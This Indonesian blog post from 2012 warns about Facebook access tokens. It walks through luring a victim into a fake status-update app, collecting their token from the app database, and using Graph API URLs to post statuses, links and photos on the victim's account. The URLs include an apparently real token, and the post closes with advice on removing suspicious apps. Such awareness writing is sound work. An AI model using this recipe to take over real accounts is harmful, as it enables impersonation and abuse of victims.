Pengumuman, Waduh, Wall to Wall udah Gak Bisa Lagi ya ? ini Gara" ada Kebijakan Facebook untuk Mengalihkan Live Stream Menjadi Comment Box, Tapi Jangan Khawatir.. Update Status Via Blackberry dan yg lain masih Bisa koq, Mau tau apaan sih Comment Box itu ? Bisa Dilihat Disini, Nah, kalo ada Saran" ttg Gimana cara nge-akalin wall to wall, silahkan Contact Mimin di Facebook Disini atau Twitter @HzCrash, atau Bisa Lewat Fanspage WI Di Disini, Trima Kasih

Bahayanya Akses Token Terhadap Facebook Anda !! Perlu Waspada Gan

Penulis on Jumat, 18 Mei 2012

Apa itu Access Token ?
Access Token merupakan struktur data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun Facebook) atau proses lainnya yang membutuhkan otorisasi.


Dari mana Access Token tercipta ?
Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token akan tersimpan pada serverhostingan pembuat aplikasi Facebook.


Kenapa dikatakan Access Token berbahaya ?
Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak bertanggung jawab maka orang tersebut dapat meng-update-kan status Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita pernah mendengar beberapa kasus pengguna Facebook berurusan dengan pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status Facebook-nya.


Bagaimana proses kerjanya ?
Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk menghindarinya. Baiklah, mari kita mulai.
Pertama – tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook saya denganFacebook korban tidak saling berteman. (jika berteman lebih baik lagi)


Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook. Dengan memanfaatkan tekhnik social engineering saya memberikan link aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya. Link aplikasinya adalahhttp://apps.facebook.com/via_apa_saja/ (Aplikasi Update Status Facebook Via Apa Saja)

Sang korban tergiur dan menggunakan aplikasi Facebook dari saya.




Untuk lebih memastikan apakah korban sudah menggunakan aplikasi Facebook dari saya, langsung saja saya login ke cpanel lalu menuju ke phpMyAdmin.



Dan ternyata si korban telah menggunakan aplikasi Facebook dari saya. Yang ditandai kotak warna merah adalah access_token Facebook korban.


Mari kita coba untuk meng-update-kan status Facebook korban dengan sedikit “injeksi url”
Injeksi url :
https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :
https://graph.facebook.com/100003787395136/feed?method=POST&message=Test update status online :lol:&access_token=AAAFc7v
0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47c
NL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD


Untuk melihat hasilnya silakan Anda klik "injeksi url" di atas lalu buka wall profil Facebook korban


Selanjutnya kita coba untuk mem-posting LINK ke akun Facebook korban.
Injeksi url :
https://graph.facebook.com/ID/feed?method=POST&link=URL&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :

https://graph.facebook.com/100003787395136/feed?method=POST&link=http://blog.cyber4rt.com&message=TestpostingLINK&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lV
zykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZ
DZD



Terakhir, saya akan memasukkan sebuah gambar ke dalam akun Facebook korban.
Injeksi url :
https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :
https://graph.facebook.com/photos?url=http://www.cyber4rt.com/idsecconf2012/logo.png&method=POST&message=TEST UPLOAD GAMBAR&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Sr
fio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixp
QVPgZDZD






Bagaimana cara menghindari penggunaan Access Token oleh orang yang tidak bertanggung jawab ?Cara untuk menghindarinya cukup mudah yaitu :

Masuk ke Pengaturan Privasi Aplikasi Facebook
Cari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi tersebut.
Di sini ada beberapa pilihan, perhatikan gambar di bawah iniket :

merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)
Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan.


Referensi :
http://id.wikipedia.org/wiki/OAuth
http://id.wikipedia.org/wiki/Access_token
https://developers.facebook.com/docs/reference/api/post/
Source From Cyber 4rt Site : In Here << Clicks
Thanks To My brother Aswin Bahar


Rating: 5



Anda sedang membaca artikel tentang Bahayanya Akses Token Terhadap Facebook Anda !! Perlu Waspada Gan dan anda bisa menemukan artikel Bahayanya Akses Token Terhadap Facebook Anda !! Perlu Waspada Gan ini dengan url https://watchinginfo.blogspot.com/2012/05/bahayanya-akses-token-terhadap-facebook.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Bahayanya Akses Token Terhadap Facebook Anda !! Perlu Waspada Gan ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Bahayanya Akses Token Terhadap Facebook Anda !! Perlu Waspada Gan sumbernya.

{ 5 komentar... read them below or add one }

Cyber4rt mengatakan...

Nice share :)

Franky Silalahi mengatakan...

Iya om :) pasti bang Aswin. hehehehe

Hendra Suherman mengatakan...

wah wah, mantab dah, tapi ga ngerti kaka,
ini pasti heker2an ya ? atuttt ... !!!

Aditya Budi Setyawan mengatakan...

sangat informatif Gan..
terimakasih banyak

Huda-Cooyz mengatakan...

Nice Info :D
www.onhacker.us Backlink ya :)

Poskan Komentar

Blog Ini Bersifat Do Follow yg Berarti dpt Memberikan Backlink Gratis Kpd Blog Anda Jika Berkomentar Dibawah ini :

"Komentar Harus Bersifat Membangun Dan Tidak Menjatuhkan akan Kami Hargai"